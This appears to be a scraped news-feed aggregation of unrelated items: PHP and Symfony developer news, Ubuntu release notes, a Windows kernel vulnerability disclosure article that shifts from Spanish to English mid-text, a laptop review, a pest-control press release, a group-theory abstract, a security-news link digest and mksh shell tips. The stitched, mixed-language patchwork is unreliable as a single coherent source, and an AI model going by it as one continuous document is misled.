Woody provides a bit of the decision-making process in a very tricky aspect of the FIG’s job: should standards be built entirely to match existing implementations, or should standards try to improve on the lessons of the existing implementations, to better them all as implementations change to support the standard? It’s all a bit chicken and egg, but a very worthy discussion to have.

  • All About Middleware - Anthony posts about PHP HTTP Middleware
  • Why Care About PHP Middleware? - Summary of the initial Anthony vs Woody approaches and background on the HTTP middleware concept
  • StackPHP - Composing HttpKernelInterface middlewares since 2013!
  • Equip - Equip is a tiny and powerful PHP micro-framework created and maintained by the engineering team at When I Work

          Episode 36: PSR-7 and The World of Tomorrow   

Two awesome guests join this week, from two different framework projects, both of whom have been very vocal about their interest in PSR-7: HTTP Message. These two chaps were Hari K T and Matthew Weier O’Phinney.

Now PSR chats can be a little boring when it’s about autoloading or tabs v bloody spaces, but this PSR could have some really big impact on the way you write PHP over the next few years.

We talk a bunch about Aura and Zend and their plans around middlewares, what motivated Matthew to get involved with taking over PSR-7, what middlewares mean for PHP in general and some of the concerns that have been fixed in recent iterations of the PSR like mutability, streams, etc.

There’s also a bit of chat about turtles, standing desks and broken ribs, while Phil slowly goes loopy on painkillers.


          The first alpha version of the Ubuntu 17.10 flavours is now available   

Lubuntu Next Desktop

As reported by SoftPedia, Canonical has announced that the images of the Alpha 1 release of Ubuntu 17.10 Artful Aardvark are now available for download and installation, although only for the Ubuntu flavours that have chosen to take part in this stage of the distro's development.

Throughout its development cycle, and following its own tradition, there will be two alphas and two betas in total. Alpha 1 is the first of the development releases, so the images are mostly based on the latest stable version of the operating system.

This means that the kernel and graphics stack we find are those of Ubuntu 17.04. In other words: kernel 4.10, X.Org 1.19.3 and Mesa 17.1.2. Systemd, however, has been updated to its latest version, systemd 233. Recall that systemd replaces init.d as the daemon that starts services. The flavours taking part in this Alpha 1 are Kubuntu 17.10, Lubuntu 17.10 and Ubuntu Kylin 17.10, each with its own set of improvements.

Alpha 2 will be the next to arrive, on 27 July (again only for the Ubuntu flavours). Those who want to check on the progress Ubuntu is making towards its next release will have to turn to the daily builds to see what is changing.

Ubuntu itself will not release the alphas or the first beta. The only development version that will carry the name of the main distro will be Beta 2 (also known as the Final Beta), scheduled for release on 28 September this year.

The first beta is expected on 31 August, with the stable version reaching all users on 19 October. Recall that Ubuntu 17.10 will include GNOME 3.26 as its default desktop, after Canonical decided to abandon Unity and convergence.

Via | SoftPedia
In Genbeta | Life after convergence: what awaits Ubuntu after abandoning Mir and Unity 8?

The article "The first alpha version of the Ubuntu 17.10 flavours is now available" was originally published in Genbeta by Sergio Agudo.


          Project zero hace pública una vulnerabilidad en el kernel de windows   
Seguridad-Google-Project-Zero.png

Desde hace tiempo, Google cuenta con un grupo de expertos de seguridad, llamado Project Zero, que buscan constantemente fallos de seguridad en todo el software actual de manera que los responsables puedan solucionarlos antes de que lo descubran piratas informáticos que puedan utilizarlos con malas intenciones. Sin embargo, los plazos para solucionarlos no son ilimitados, sino que los desarrolladores, ya sea uno independiente como un gigante como Microsoft, tienen como máximo 90 días para lanzar el parche de seguridad o, de lo contrario, el fallo se hará público y pondrá en peligro a todos los usuarios, tal como acaba de ocurrir con el nuevo fallo de seguridad de Windows hecho público.



No es la primera vez que Google pone en evidencia a Microsoft (y en peligro a los usuarios) haciendo públicos fallos en su sistema operativo Windows, y tampoco será la última. Hace unas horas, los ingenieros de Project Zero hacían pública una nueva vulnerabilidad en el Kernel de Windows que podía permitir a un atacante evadir las medidas de seguridad y mitigación del sistema operativo con relativa facilidad.



Este fallo de seguridad fue descubierto el pasado mes de marzo por los ingenieros del grupo de Google y, acto seguido, fue reportado a Microsoft, quien lo solucionó y liberó su parche de seguridad con las últimas actualizaciones de seguridad de Windows de este mismo mes. Sin embargo, algo le ha pasado a Microsoft, y es que, aunque en teoría el parche debería haber solucionado la vulnerabilidad, esta sigue estando presente en todos los ordenadores y, al haberse agotado el plazo, finalmente se ha dado a conocer.



Tal como aseguran los ingenieros de Project Zero, esta vulnerabilidad puede permitir a cualquier usuario acceder a la memoria del Kernel de Windows y, con un sencillo exploit, saltarse los sistemas de protección y mitigación de amenazas del sistema operativo. La vulnerabilidad ha sido considerada como de peligrosidad media y, según parece, solo afecta a los usuarios de las versiones de 32 bits de Windows, desde Windows 7 hasta Windows 10.



Microsoft is in no hurry to fix this Windows vulnerability, and the patch may be delayed until after the summer



Microsoft fixed the security flaw; however, for some reason it has remained present in systems, so Google has finally made it public, as its programme promises.



The logical step, if Microsoft got the patch wrong, would be to release a new one as soon as possible, if not ahead of schedule (since it is not a widely known or high-severity vulnerability), for example with the next security patches scheduled for 11 July. However, Microsoft has stated that it is in no hurry to fix the vulnerability.



Therefore, unless Microsoft changes its mind and does fix the flaw, we may see this patch for the new vulnerability in neither the July nor the August security updates.



As mentioned, the vulnerability only affects 32-bit systems, so if your Windows is 64-bit there is nothing to worry about.



https://www.redeszone.net/2017/06/28/project-zero-vulnerabilidad-kernel-windows/
          Geometric Analysis of the Bergman Kernel and Metric   

          Poppen, Munoz carry Cedar Rapids to 11-3 win over Burlington   
CEDAR RAPIDS, Iowa (AP) -- Gorge Munoz hit a three-run home run and had four hits, driving in five, and Sean Poppen struck out nine hitters over seven innings as the Cedar Rapids Kernels topped the Burlington Bees 11-3 on…
          Test Engineer, Middleware in Plantation, FL   
FL-Sunrise, Overview: Develop and execute functional test cases targeting our embedded components and their APIs based on the Linux kernel. This will include the associated drivers as well as functions to support the manufacturing of our product. Responsibilities: · As a software test engineer, you will work with the development and automation teams to define, develop, and execute test cases that wil
          Kristof Willen: Millenium Falcon   
Hardware

My old netbook is now seven years old and shows its age: boot times of up to two minutes, and working in Chrome was a drag and took ages. And I'm not even talking about performing updates. All down to the slow CPU (never again an Atom!) and the slow hard drive. The last two occasions I used the laptop were at Config Management Days and the Red Hat Summit, and I can tell you the experience was unpleasant. So a new laptop was needed.

Luckily, the laptop market has reinvented itself after collapsing during the rise of tablets. Ultrabooks are now super slim, super light and extremely powerful. My new laptop needed to be:

  • fast: no Celeron or Atom chip allowed; an i5 as the minimum CPU
  • beautiful: I need a companion to my vanity. No plasticky stuff; well built and good quality.
  • well supported by Linux: Linux would be installed, so the hardware needed to be supported
  • reasonably cheap: speaks for itself; a lot of nice ultrabooks are available, but I didn't want to pay an arm and a leg.
  • light and small: I carry this everywhere around the world, so the laptop shouldn't weigh more than 1.4 kg

Soon, I saw two main candidates. First, the Dell XPS13 is still regarded as the ultrabook king. It supports Linux nicely and has that beautiful Infinity display. Disadvantages were that it was on the heavy side, and I wasn't a fan of its design either. And a tad on the expensive side as well. On the other side, there was the Asus Zenbook 3 (UX390), which was stunningly beautiful, had a nice screen as well and was extremely light at 0.9 kg.

However, when I saw the silver variant in the shop, I found it a bit on the small side. So when I saw its 14-inch brother, the UX430UQ, I was immediately sold. This is a 14-inch laptop - it is advertised as a 13-inch laptop with a 14-inch screen, but don't believe that - which weighs just 1.25 kg, has a nice dark grey spun-metal exterior and an excellent keyboard and screen. Equipped with an i7 CPU and 16 GB of RAM, it doesn't fail to deliver on the performance front. Shame that Asus doesn't provide a sleeve with this laptop, as it does with the UX390. Also important: it doesn't have a security lock slot, so don't leave this baby unattended.

I wiped Windows 10 and booted the Fedora netinstall CD, but it seemed that both WiFi and the trackpad were unsupported. I lost quite some time on this, but eventually decided to boot the Fedora LiveCD, only to find out everything worked out of the box. Probably the netinstall CD uses an older kernel. I baptised the laptop Millenium Falcon, as I have switched to spaceship names for my hardware lately.


          But why did Kcee, Ice Prince and Phyno jump in the kernel with Hushpuppi?   

CAVEAT: We terribly loathe the fact that we find ourselves in a situation where we have to contribute a measure...

Read » But why did Kcee, Ice Prince and Phyno jump in the kernel with Hushpuppi? on YNaija


          Comment on X marks the spot by MattiK   
Hi! I was very excited about the 14.04 LTS release on servers. Docker and Node.js both got very mature and production-ready for that release. Now I'm equally excited about snappy applications for the desktop. However, I'm concerned about how 16.04 LTS fits current desktop requirements. Recently, the consumer authority updated its policy on how long personal computers must last under normal daily use, including software. Before, it was OK if a machine worked for a minimum of two years after purchase. Now the vendor is accountable if it breaks within two years of purchase, and for two further years it must be repairable to working condition at a reasonable price. What this means is that the current Ubuntu development cycle, with LTS releases and intermediate releases in between, may be outdated. To fulfil the requirements on consumer tech, there should be at minimum a four-year stable kernel branch on Ubuntu computers at time of sale, or some way to ensure that kernel upgrades to new releases don't break hardware compatibility. Compared to others, this is easy for Apple because it has a limited amount of hardware. At this point it looks like Microsoft chose to provide long-term stable kernels for Windows 10. I think it should be considered to make the LTS kernel supported for five years plus the release cycle to fulfil the requirements. However, this is not the case for stuff on top of the kernel. I think it is perfectly acceptable to update applications and not keep them stable, as long as features are clearly marked "deprecated" a minimum of two years before removal, just to save maintenance effort. This kind of policy may apply to some APIs too. To save more maintenance effort, a three-year cycle may be optimal for today's requirements. Snappy might bring some help to fulfil this "two years working, four years fixable at a reasonable price after purchase" requirement?
          Rentokil Initial Malaysia Addresses the Magnitude of Stored Product Insects Infestation in Food Supply Chain Management   

Stored product insects (SPI) can infiltrate the food supply chain through multiple entry points, and experts from Rentokil Initial Malaysia are sharing how SPI contribute to food losses in Asia.

Petaling Jaya, Selangor -- (SBWIRE) -- 09/22/2015 -- According to a study by the International Food Policy Research Institute, pests destroy an estimated RM184.9 billion worth of crop production annually in Asia, and stored product insects (SPI) have been identified as one of the pests contributing to the losses.

SPI commonly found in Malaysia include the cigarette beetle, rice weevil, sawtoothed grain beetle, and flour beetle. They are normally grouped into two categories: for example, the rice weevil and lesser grain borer are known as 'internal feeders' as they feed within the kernel, whereas the sawtoothed grain beetle and flat grain beetle are described as 'external feeders' because they feed on grain dust and debris without entering the kernel.

SPI can pose a huge threat in the entire supply chain especially in food processing facilities and warehouses because they usually spread and grow their colony in the food commodities. In fact, the most devastating damage that SPI can cause is commodities losses due to SPI contaminations. And due to their minuscule size, SPI infestations can be difficult to detect in the initial stages. As a result, SPI may be ground together with the raw materials, packed and sold to the consumers.

Commercial buyers may refuse to accept delivery of infested grain, or pay a reduced price, as SPI also encourage the growth of mould, including fungi responsible for the production of mycotoxins that can be toxic, allergenic and unfit for human consumption. Therefore, regardless of the size or severity of the infestation, the presence of SPI is not a situation to be taken lightly, because it will consequently lead to costly downtime, food recalls and, in the worst-case scenario, business closure.

Common signs of SPI infestation are traces of adult insects, larvae, pupae or silken webbing in the raw materials and food storage bins. Researchers at the Institute of Food and Agricultural Sciences found that 75% of SPI infestations usually occur at the folds and corners of a box, which explains how they commonly enter a facility during logistics. A newly hatched larva can penetrate cracks as small as 0.12 mm. SPI can also pierce through sealed packages by chewing through the corrugated paperboard. Lastly, birds also pose a risk to the supply chain, as they can carry and spread insects and mites into the food processing facility.

How does IPM help in controlling SPI infestation?

Integrated pest management (IPM) is a dynamic combination of multiple pest control practices designed and implemented using a variety of techniques. As a proactive approach to pest management, IPM places a heavy emphasis on constant pest monitoring, pest exclusion and sanitation to ensure that high standards of hygiene practices are maintained.

Here are some examples of IPM practices for SPI control:

- Clean up all spillages and dust accumulation in the premises, machinery, equipment, storage and transport vehicles regularly.
- All stock and food material should be stored off the floor and away from walls to facilitate cleaning and inspections.
- Keep raw materials in robust packaging to prevent SPI infiltration.

'Although food contamination can occur at any point from farm to table, pest infestation along with unsanitary conditions in the food manufacturing sector can lead to severe business consequences. Regardless of the size of business operations, pest management should be treated as an utmost priority because the impact of a pest infestation can be devastating,' says Ms. Carol Lam, Managing Director of Rentokil Initial Malaysia.

About Rentokil Initial Malaysia
Rentokil Pest Control is part of the Rentokil Initial group, one of the largest business services companies in the world. As the market leader in the pest control industry, Rentokil's Integrated Pest Management (IPM) programme provides comprehensive pest control services for commercial sectors ranging from food processing and pharmaceuticals to industrial and manufacturing.

The programme is designed to be compliant with recognised standards or certification such as AIB International, BRC Global International Standards, Good Manufacturing Practice (GMP), and Hazard Analysis and Critical Control Points (HACCP). Continuous pest monitoring, regular visitation and proactive recommendations are the standard supports delivered to ensure the effectiveness of the IPM programme; giving you peace of mind.

To further complement Rentokil's IPM programme, an online reporting and analysis system has been developed to help customers monitor pest activities at multiple locations effectively. It also provides better traceability and easy access to all key information and service delivery records needed for pest risk management and food audit requirement.

At Rentokil Initial Malaysia, two brands are focused on providing the best services with nationwide coverage, fast response and expert technical knowledge: Rentokil Pest Control and Initial Hygiene.

Visit http://www.rentokil-initial.com.my to find out how Rentokil Initial (M) Sdn Bhd services can add value to different business sectors.

Press Contacts:
May Chang
Assistant Digital Marketing Manager
0192864905

Kellie Yong
Senior Marketing Manager
0192428339

15th Floor, Menara Yayasan Selangor
No. 18A, Jalan Persiaran Barat
46000 Petaling Jaya, Selangor, Malaysia.
1300885911
http://www.rentokil.com.my/

For more information on this press release visit: http://www.sbwire.com/press-releases/rentokil-initial-malaysia-addresses-magnitude-stored-product-insects-627173.htm

Media Relations Contact

Clementine Cheah
Digital Marketing Executive
Rentokil Initial Malaysia
Telephone: 1300 887 911
Email: Click to Email Clementine Cheah
Web: http://www.rentokil.com.my


          The Legend of 5 Kernels: A Thanksgiving Story   
           A week of symfony #546 (12-18 June 2017)    

This week, Symfony introduced Webpack Encore, the new official tool to manage web assets in Symfony applications. Meanwhile, we continued removing some dependencies from the upcoming Symfony 3.4 version, such as Doctrine Cache and the Stopwatch component. Lastly, we announced the dates and Call for Papers deadlines of the next Symfony conferences in London, San Francisco, Berlin and Cluj (Romania).

Symfony development highlights

2.7 changelog:

  • 4cff052: [HttpFoundation] added support for new 7.1 session options
  • d44f143: [Filesystem] added workaround in Filesystem::rename for PHP bug
  • baf988d: [Translation, FrameworkBundle] fixed resource loading order inconsistency
  • f392282: [Routing] expose request in route conditions if possible
  • 551e5ba: [HttpKernel] fixed two edge cases in ResponseCacheStrategy
  • 3c2b1ff: [HttpKernel] keep s-maxage when expiry and validation are used in combination
  • c8884e7: [TwigBundle] added Content-Type header for exception response
  • 436d5e4: [FrameworkBundle] clean assets of the bundles that no longer exist

3.2 changelog:

  • aa94dd6: [PropertyAccess] fixed usage with anonymous classes
  • dce2671: [PropertyAccess] do not silence TypeErrors from client code
  • dddc5bd: [SecurityBundle] move cache of the firewall context into the request parameters

3.3 changelog:

  • 6852b10: [PhpUnit Bridge] fixed the conditional definition of the SymfonyTestsListener
  • 7fc2552: [DependencyInjection] fixed keys resolution in ResolveParameterPlaceHoldersPass
  • 748a999: [Yaml] fixed linting yaml with constants as keys
  • 3278915: [Config] fixed ** GlobResource on Windows
  • 57bed81: [HttpFoundation] added back support for legacy constant values
  • 4667262: [FrameworkBundle] don't set pre-defined esi/ssi services
  • 60e3a99: [WebServerBundle] fixed router script option BC
  • 772ab3d: [Config] fixed Composer resources between web/cli

3.4 changelog:

  • 18ecbd7, a75a32d: [FrameworkBundle] removed dependency on Doctrine cache
  • cc2363f, 17d23a7: [FrameworkBundle] drop hard dependency on the Stopwatch component
  • 0300412: [SecurityBundle] give info about called security listeners in profile
  • 936c1a5: [FrameworkBundle] deprecate useless --no-prefix option
  • 2fe6e69: [WebProfilerBundle] sticky ajax window
  • a03e194: [DependencyInjection] reference instead of inline for array-params
  • 1ed41b5: [Serializer] allow to provide timezone in DateTimeNormalizer
  • bf094ef: [Security] consistent error handling in remember me services
  • e992eae: [Yaml] deprecate using the non-specific tag
  • bc4dd8f: [Security] trigger a deprecation when a voter is missing the VoterInterface
  • 1f6330a: [Validator] added support to check specific DNS record type for URL
  • 6727a26: [FrameworkBundle] allow .yaml file extension everywhere
  • 1cdbb7d: [Serializer] Xml encoder optional type cast
  • 0478ecd: [HttpFoundation] shift responsibility for keeping Date header to ResponseHeaderBag

Master changelog:

  • 3bbb657: [HttpFoundation] removed obsolete ini settings for sessions

Newest issues and pull requests

Twig development highlights

Master changelog:

  • 53cfcea: fixed deprecation when using Twig_Profiler_Dumper_Html

Silex development highlights

Master changelog:

  • 268e3d3: fixed RedirectableUrlMatcher needs to return a proper array with the _route parameter
  • 9cbf194: added JSON manifest version strategy support
  • 6260671: fixed error using EsiFragment with provider and Twig functions

They talked about us


Be trained by Symfony experts - 2017-07-03 Paris - 2017-07-10 Paris - 2017-07-10 Paris

           A week of symfony #545 (5-11 June 2017)    

This week, Symfony 3.3.2 was released to fix the minor issues found since the final 3.3.0 release last week. Meanwhile, the upcoming Symfony 3.4 version added support to automatically enable the routing annotation loader and improved the VarDump search feature. Lastly, the next Symfony conferences opened their Call for Papers period: SymfonyLive London 2017, SymfonyLive San Francisco 2017, and SymfonyCon 2017 in Cluj (Romania).

Symfony development highlights

2.7 changelog:

  • 658236b: [TwigBridge] fixed namespaced classes
  • 62cbfdd: [SecurityBundle] show unique Inherited roles in profile panel
  • 589f2b1: [HttpFoundation] cache ipCheck results
  • 0c17767: [FrameworkBundle] fixed perf issue in CacheClearCommand::warmup()

2.8 changelog:

  • 621b769: [Form] mixed attr option between guessed options and user options

3.2 changelog:

  • 81a5057: [Cache] fixed extensibility of TagAwareAdapter::TAGS_PREFIX
  • 40beab4: [Cache] ApcuAdapter::isSupported() should return true when apc.enable_cli=Off

3.3 changelog:

  • 1272d2a: [DependencyInjection] fixed named args support in ChildDefinition
  • 58f03a7: [Cache] fallback to positional when keyed results are broken
  • 085d8fe: [HttpFoundation, FrameworkBundle] reverted "trusted proxies" BC break
  • 1006959: [HttpKernel, Debug] fixed missing trace on deprecations collected during bootstrapping & silenced errors
  • 99573dc: [MonologBridge] do not silence errors in ServerLogHandler::formatRecord
  • bd0603d: [Yaml] removed line number in deprecation notices

3.4 changelog:

  • 384b34b: [PropertyInfo] made ReflectionExtractor's prefix lists instance variables
  • bdd888f: [FrameworkBundle] automatically enable the routing annotation loader
  • ea3ed4c: [VarDumper] cycle prev/next searching in HTML dumps
  • e4e1b81: [FrameworkBundle] deprecate not using KERNEL_CLASS in KernelTestCase
  • 1195c7d: [Process] deprecated ProcessBuilder
  • 63ecc9c: [SecurityBundle] lazy load security listeners

Master changelog:

  • 384b34b: [PropertyInfo] made ReflectionExtractor's prefix lists instance variables

Newest issues and pull requests

Twig development highlights

Master changelog:

  • 23e64af: use class_exists instead of require to play nice with inlining
  • 8463178: use class_exists instead of require
  • a9fe0a9: moved class_exists() at the bottom of files

They talked about us


Be trained by Symfony experts - 2017-07-03 Paris - 2017-07-10 Paris - 2017-07-10 Paris

          Primitive groups, graph endomorphisms and synchronization   
Abstract: Let $\Omega$ be a set of cardinality $n$, let $G$ be a permutation group on $\Omega$ and let $f:\Omega \to \Omega$ be a map that is not a permutation. We say that $G$ synchronizes $f$ if the transformation semigroup $\langle G,f\rangle$ contains a constant map, and that $G$ is a synchronizing group if $G$ synchronizes every non-permutation.

A synchronizing group is necessarily primitive, but there are primitive groups that are not synchronizing. Every non-synchronizing primitive group fails to synchronize at least one uniform transformation (that is, a transformation whose kernel has parts of equal size), and it had previously been conjectured that this was essentially the only way in which a primitive group could fail to be synchronizing; in other words, that a primitive group synchronizes every non-uniform transformation.

The first goal of this paper is to prove that this conjecture is false, by exhibiting primitive groups that fail to synchronize specific non-uniform transformations of ranks 5 and 6. As it has previously been shown that primitive groups synchronize every non-uniform transformation of rank at most 4, these examples are of the lowest possible rank. In addition, we produce graphs with primitive automorphism groups that have approximately $\sqrt{n}$ non-synchronizing ranks, thus refuting another conjecture on the number of non-synchronizing ranks of a primitive group.

The second goal of this paper is to extend the spectrum of ranks for which it is known that primitive groups synchronize every non-uniform transformation of that rank. It has previously been shown that a primitive group of degree $n$ synchronizes every non-uniform transformation of rank $n-1$ and $n-2$, and here this is extended to $n-3$ and $n-4$. In the process, we will obtain a purely graph-theoretical result showing that, with limited exceptions, in a vertex-primitive graph the union of neighbourhoods of a set of vertices $A$ is bounded below by a function that is asymptotically $\sqrt{|A|}$. Determining the exact spectrum of ranks for which there exist non-uniform transformations not synchronized by some primitive group is just one of several natural, but possibly difficult, problems on automata, primitive groups, graphs and computational algebra arising from this work; these are outlined in the final section.
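As a toy illustration of the synchronization definition (my own worked micro-example, not taken from the paper): take $\Omega=\{1,2,3\}$, the primitive group $G=S_3$, and the rank-2 non-uniform map $f$ with $f(1)=f(2)=1$, $f(3)=3$ (its kernel has parts $\{1,2\}$ and $\{3\}$ of unequal size).

```latex
% Choosing g = (2\,3) \in G and applying maps left to right:
\begin{align*}
  1 &\xrightarrow{f} 1 \xrightarrow{g} 1 \xrightarrow{f} 1,\\
  2 &\xrightarrow{f} 1 \xrightarrow{g} 1 \xrightarrow{f} 1,\\
  3 &\xrightarrow{f} 3 \xrightarrow{g} 2 \xrightarrow{f} 1.
\end{align*}
% Hence fgf is the constant map onto \{1\}, so \langle G,f\rangle
% contains a constant map and S_3 synchronizes this f.
```

The paper's examples show that, unlike in this tiny case, a primitive group can fail to synchronize a non-uniform transformation once the rank reaches 5.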
          [Knowledge] June 29 - Daily Security Knowledge Highlights   
[Knowledge] June 29 - Daily Security Knowledge Highlights

2017-06-29 11:34:38

Source: Anquanke (安全客)






Author: 天朝第一渣渣roots01






Highlights: After the cyber attack, FedEx suspends trading of its shares; Surprise! NotPetya is a cyber weapon, not ransomware; stored XSS in the comments section of the Starbucks website blog; the paranoid PlugX malware (analysis); USE-AFTER-SILENCE: VMware quietly patches a UAF vulnerability; experts find a critical remote buffer overflow vulnerability in Skype


News:

After the cyber attack, FedEx temporarily halts trading of its shares

https://www.darkreading.com/attacks-breaches/after-cyber-attack-fedex-temporarily-halts-trading-of-its-shares/d/d-id/1329244?_mc=RSS_DR_EDT


Surprise! NotPetya is a cyber weapon, not ransomware

https://www.bleepingcomputer.com/news/security/surprise-notpetya-is-a-cyber-weapon-its-not-ransomware/


[Live coverage] WCTF World Hacker Masters

http://bobao.360.cn/ctf/activity/452.html



Technical:

GSoC (Google Summer of Code) Phase 1: Timeless Debugger Update (the Timeless Debugger is a new debugging mode, very similar to reverse debugging and record-and-replay.)

https://rkx1209.github.io/2017/06/28/gsoc-phase1-timeless-debugger-update.html


Identifying a vulnerability (CVE-2017-6008) in the standalone HitmanPro scanner, version 3.7.15 Build 281, on Windows 7

http://trackwatch.com/kernel-pool-overflow-exploitation-in-real-world-windows-7/


Stored XSS in the comments section of the Starbucks website blog

https://hackerone.com/reports/218226


Analyzing malware with radare2

http://unlogic.co.uk/2017/06/28/malwaring-with-r2/index.html


RunShellcode: a small tool for running shellcode

https://github.com/zerosum0x0/RunShellcode


The paranoid PlugX malware (analysis)

https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/


USE-AFTER-SILENCE: VMware quietly patches a UAF vulnerability

https://www.zerodayinitiative.com/blog/2017/6/26/use-after-silence-exploiting-a-quietly-patched-uaf-in-vmware


New ransomware, old techniques: Petya adds worm capabilities (official Microsoft analysis)

https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/


Experts find a critical remote buffer overflow vulnerability in Skype.

http://securityaffairs.co/wordpress/60507/hacking/skype-buffer-overflow.html




This article was originally published by Anquanke (安全客); please credit the source and link to this article when reposting.
Article URL: http://bobao.360.cn/learning/detail/4041.html

          Comment on "Linux Mint Optimization" by Halyluya   
The coolest speedup is installing an SSD plus lots of RAM. By the way, special thanks for the tip about mounting into memory! I'd heard about it but never used it; I'll have to give it a try. This is already an oldish SSD (SATA 3). P.S. $ systemd-analyze Startup finished in 2.941s (kernel) + 8.147s (userspace) = 11.089s
          “git find” published; test, review, fix it please   

I just published the first version of git find on gh/mirabilos/git-find for easy collaboration. The repository deliberately only contains the script and the manual page so it can easily be merged into git.git with complete history later, should they accept it. git find is MirOS licenced. It does require a recent mksh (Update: I did start it in POSIX sh first, but it eventually turned out to require arrays, and I don’t know perl(1) and am not going to rewrite it in C) and some common utility extensions to deal with NUL-separated lines (sort -z, grep -z, git ls-tree -z); also, support for '\0' in tr(1) and a comm(1) that does not choke on embedded NULs in lines.

To install or uninstall it, run…

	$ git clone git@github.com:mirabilos/git-find.git
	$ cd git-find
	$ sudo ln -sf $PWD/git-find /usr/lib/git-core/
	$ sudo cp git-find.1 /usr/local/share/man/man1/
	… hack …
	$ sudo rm /usr/lib/git-core/git-find \
	    /usr/local/share/man/man1/git-find.1

… then you can call it as “git find” and look at the documentation with “git help find”, as is customary.

The idea behind this utility is to have a tool like “git grep” that acts on the list of files known to git (and not e.g. ignored files) to quickly search for, say, all PNG files in the repository (but not the generated ones). “git find” acts on the index for the HEAD, i.e. whatever commit is currently checked-out (unlike “git grep” which also knows about “git add”ed files; fix welcome) and then offers a filter syntax similar to find(1) to follow up: parenthesēs, ! for negation, -a and -o for boolean are supported, as well as -name, -regex and -wholename and their case-insensitive variants, although regex uses grep(1) without (or, if the global option -E is given, with) -E, and the pattern matches use mksh(1)’s, which ignores the locale and doesn’t do [[:alpha:]] character classes yet. On the plus side, the output is guaranteed to be sorted; on the minus side, it is rather wastefully using temporary files (under $TMPDIR of course, so use of tmpfs is recommended). -print0 is the only output option (-print being the default).
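The core of this mode can be approximated with stock git plumbing and the NUL-aware utilities the post mentions. The following is only a sketch of the underlying idea, not the actual git-find implementation; the throwaway repository and file names are made up for demonstration:

```shell
# Sketch: emulate the core of "git find -name '*.png'" with git plumbing.
# Build a throwaway demo repository (hypothetical file names).
repo=$(mktemp -d) && cd "$repo"
git init -q
touch logo.png notes.txt icons.png
git add .
git -c user.name=demo -c user.email=demo@example.com commit -qm demo
# Files known to HEAD, NUL-separated, filtered by pattern, sorted, printed:
git ls-tree -r -z --name-only HEAD | grep -z '\.png$' | sort -z | tr '\0' '\n'
```

The real git find layers the find(1)-style boolean filter syntax and -print0 on top of this ls-tree/grep -z/sort -z core, which is why the NUL-aware utility extensions are listed as prerequisites above.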

Another mode "forwards" the file list to the system find; since it doesn't support DOS-style response files, this only works if the number of files is smaller than the operating system's limit; this mode supports the full range (except -maxdepth) of the system find(1) filters, e.g. -mmin -1 and -ls, but it incurs a filesystem access penalty for the entire tree and doesn't sort the output, though it can do -ls or even -exec.

The idea here is that it can collaboratively be improved, reviewed, fixed, etc. and then, should they agree, with the entire history, subtree-merged into git.git and shipped to the world.

Part of the development was sponsored by tarent solutions GmbH, the rest and the entire manual page were done in my vacation.


          portable shebang for mksh on Unix and Android   

carstenh asked in IRC how to make a shebang for mksh(1) scripts that works on both regular Unix and Android.

This is not as easy as it looks, though. Most Unicēs will have mksh installed, either manually or by means of the native package system, as /bin/mksh. Some put it into package manager-specific directories; I saw /sw/bin/mksh, /usr/local/bin/mksh and /usr/pkg/bin/mksh so far. Some systems have it as /usr/bin/mksh but these are usually those who got poettering’d and have /bin a symlink anyway. Most of these systems also have env(1) as /usr/bin/env.

Android, on the contrary, ships with precisely one shell. This has been mksh for a while, thankfully. There is, however, neither a /bin nor a /usr directory. mksh usually lives as /system/bin/mksh, with /system/bin/sh a symlink(7) to the former location. Some broken Android versions ship the binary in the latter location instead and do not ship anything that matches mksh on the $PATH, but I hope they merge my AOSP patch to revert this bad change (especially as some third-party Android toolkits overwrite /system/bin/sh with busybox sh or GNU bash and you’d lose mksh in the process). However, on all official Android systems, mksh is the system shell. This will be important later.

The obvious and correct fix is, of course, to chmod -x the scripts and call them explicitly as mksh scriptname. This is not always possible or desirable; sometimes, people will wish it to be in the $PATH and executable, so we need a different solution.

There’s a neat trick with shebangs – the absence of one is handled specifically by most systems in various ways. I remember reading about it, but don’t remember where; I can’t find it on Sven Mascheck’s excellent pages… but: the C shell variants run a script with the Bourne Shell if its first line is a sole colon (‘:’), the Bourne family shells run it with themselves or ${EXECSHELL:-/bin/sh} in those cases, and the kernel with the system shell, AFAIK. So we have a way to get most things that could call the script to interpret it as Bourne/POSIX shell script on most systems. Then we just have to add a Bourne shell scriptlet that switches to mksh iff the current shell isn’t it (lksh, or something totally different). On Android, there is only ever one shell (or the toolkit installer better preserve mksh as mksh), so this doesn’t do anything (I hope – but did not test – that the kernel invokes the system shell correctly despite it not lying under /bin/sh) nor does it need to.

This leaves us with the following “shebang”:

	:
	case ${KSH_VERSION-} in
	*MIRBSD\ KSH*) ;;
	*)	# re-run with The MirBSD Korn Shell, this is an mksh-specific script
		test "${ZSH_VERSION+set}" = set && alias -g '${1+"$@"}'='"$@"'
		exec mksh "$0" ${1+"$@"}
		echo >&2 E: mksh re-exec failed, should not happen
		exit 127 ;;
	esac
 

The case argument not only does not need to, but actually should not be quoted; the expansion is a set -u guard; the entire scriptlet is set -e safe as well; comments and expansions are safe. exec shall not return, but if it does (GNU bash violates POSIX that way, for example), we use POSIX’ appropriate errorlevel. zsh is funny with the Bourne shell’s way of using "$@" properly. But this should really be portable. The snippet is both too short and too obvious (“only way to do it”) to be protected by copyright law.

Thanks to carstenh and Ypnose for discussing things like this with us in IRC, sending in bugfixes (and changes we decline, with reason), etc. – it feels like we have a real community, not just consuments ☺


          Not just Amigas, editors and errnos   

mksh made quite some waves (machine translation of the third article) recently. Let’s state it’s not just Amigas – ara5 is a buildd running the Atari kernel, an emulated one though. On the other hand, the bare-metal Ataris used to be the fastest buildds, so I expect we get them back online soonish. I’m currently fighting with some buildd software bugfixes, but once they’re in, we will make more of them. Oh, and porterboxen! Does anyone want to host a VM with a porterbox? Requirements: wheezy host system (can be emulated), 1 GiB RAM, one CPU core with about 6500 BogoMIPS or more (so the emulated system has decent speed; an AMD Phenom II X4 3.2 GHz does just fine). Oh, and mksh is ported to more and more platforms, like 386BSD 0.0 with GCC 1.39, and QNX 4 with Watcom… and more bugfixes are also being worked on. And let’s not forget features!

jupp got refreshed: it’s got a bracketed paste mode, which is even auto-enabled on xterm-xfree86 (though the xterm(1) in MirBSD’s a tad too old to know it; will update that later, just imported sendmail(8) 8.14.6 and lynx(1) 2.8.8dev.15 into base, more to come) and will be enhanced later (should disable auto-indent, wordwrap, status line updates, and possibly more), lots of new functions and bindings, now uses mkstemp(3) to create backup files race-free, and more (read the NEWS file).

